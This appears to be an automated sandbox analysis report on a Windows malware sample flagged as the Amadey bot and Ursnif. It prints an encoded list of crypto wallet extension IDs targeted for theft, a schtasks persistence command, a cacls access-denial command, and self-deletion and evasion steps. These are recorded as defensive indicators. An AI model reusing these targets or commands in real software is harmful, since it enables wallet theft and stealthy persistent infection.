Source: 13.3.B4A7.exe.d290000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 13.3.B4A7.exe.d290000.1.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2364:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2820:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\afbc8f21a2e970df42df393e0a16fb7c

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe

Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A7.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\EB2B.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\q4Z52wRd28.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: q4Z52wRd28.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: q4Z52wRd28.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: q4Z52wRd28.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: q4Z52wRd28.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: q4Z52wRd28.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: q4Z52wRd28.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: q4Z52wRd28.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\wide-ponicomonodido52\cepoh.pdb source: q4Z52wRd28.exe, cttgcew.1.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: A852.exe, A852.exe, 0000000C.00000002.423113351.0000000000400000.00000040.00000001.01000000.00000009.sdmp, A852.exe, 0000000C.00000003.416658958.0000000000AF0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000003.432928807.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000E.00000002.773732313.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, rovwer.exe, 0000001A.00000002.578955706.0000000000400000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: DC:\giroyid.pdb source: A852.exe, 0000000C.00000000.410237747.0000000000401000.00000020.00000001.01000000.00000009.sdmp, rovwer.exe, 0000000E.00000000.421565865.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000001A.00000000.445061282.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe.12.dr, A852.exe.1.dr
Source:	Binary string: C:\cekezuca_v.pdb source: E35A.exe, 00000018.00000000.442927876.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, E35A.exe.1.dr
Source:	Binary string: C:\zuc.pdb source: F771.exe, 00000020.00000000.454432318.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, F771.exe.1.dr
Source:	Binary string: _.pdb source: F771.exe, 00000020.00000002.848936854.000000000263A000.00000004.00000800.00020000.00000000.sdmp, F771.exe, 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\giroyid.pdb source: A852.exe, 0000000C.00000000.410237747.0000000000401000.00000020.00000001.01000000.00000009.sdmp, rovwer.exe, 0000000E.00000000.421565865.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe, 0000001A.00000000.445061282.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, rovwer.exe.12.dr, A852.exe.1.dr
Source:	Binary string: @C:\cekezuca_v.pdb source: E35A.exe, 00000018.00000000.442927876.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, E35A.exe.1.dr

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\A852.exe	Unpacked PE file: 12.2.A852.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Unpacked PE file: 14.2.rovwer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	Unpacked PE file: 24.2.E35A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Unpacked PE file: 26.2.rovwer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Unpacked PE file: 32.2.F771.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Unpacked PE file: 0.2.q4Z52wRd28.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\cttgcew	Unpacked PE file: 11.2.cttgcew.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Unpacked PE file: 12.2.A852.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Unpacked PE file: 14.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	Unpacked PE file: 24.2.E35A.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Unpacked PE file: 26.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Unpacked PE file: 32.2.F771.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_00401268 push cs; iretd
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_00402B84 push esp; iretd
Source: C:\Users\user\Desktop\q4Z52wRd28.exe	Code function: 0_2_00412E88 push es; retf
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_00401268 push cs; iretd
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_00402B84 push esp; iretd
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_00412E88 push es; retf
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_008612CF push cs; iretd
Source: C:\Users\user\AppData\Roaming\cttgcew	Code function: 11_2_00861790 push 81396969h; iretd
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00410C48 push E8FFFFFBh; iretd
Source: C:\Users\user\AppData\Local\Temp\A852.exe	Code function: 12_2_00418C56 push ecx; ret

Source: CF35.exe.1.dr

Static PE information: section name: _RDATA

Source: cred64[1].dll.14.dr	Static PE information: real checksum: 0x0 should be: 0x26b56
Source: EB2B.exe.1.dr	Static PE information: real checksum: 0xae41 should be: 0x5a5ca
Source: CF35.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x31822d
Source: cred64.dll.14.dr	Static PE information: real checksum: 0x0 should be: 0x26b56

Source: initial sample

Static PE information: section name: .text entropy: 7.881559830047924

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000E.00000002.806199493.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.793487100.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.805707000.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.603169508.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rovwer.exe PID: 4852, type: MEMORYSTR

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\cttgcew

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B4A7.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E35A.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\A852.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A852.exe	File created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\cttgcew	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CF35.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\EB2B.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F771.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 3000
Source: unknown	Network traffic detected: HTTP traffic on port 3000 -> 49824

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\q4z52wrd28.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\cttgcew:Zone.Identifier read attributes | delete

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"

Source: C:\Users\user\AppData\Local\Temp\A852.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\E35A.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F771.exe	Process information set: NOOPENFILEERRORBOX
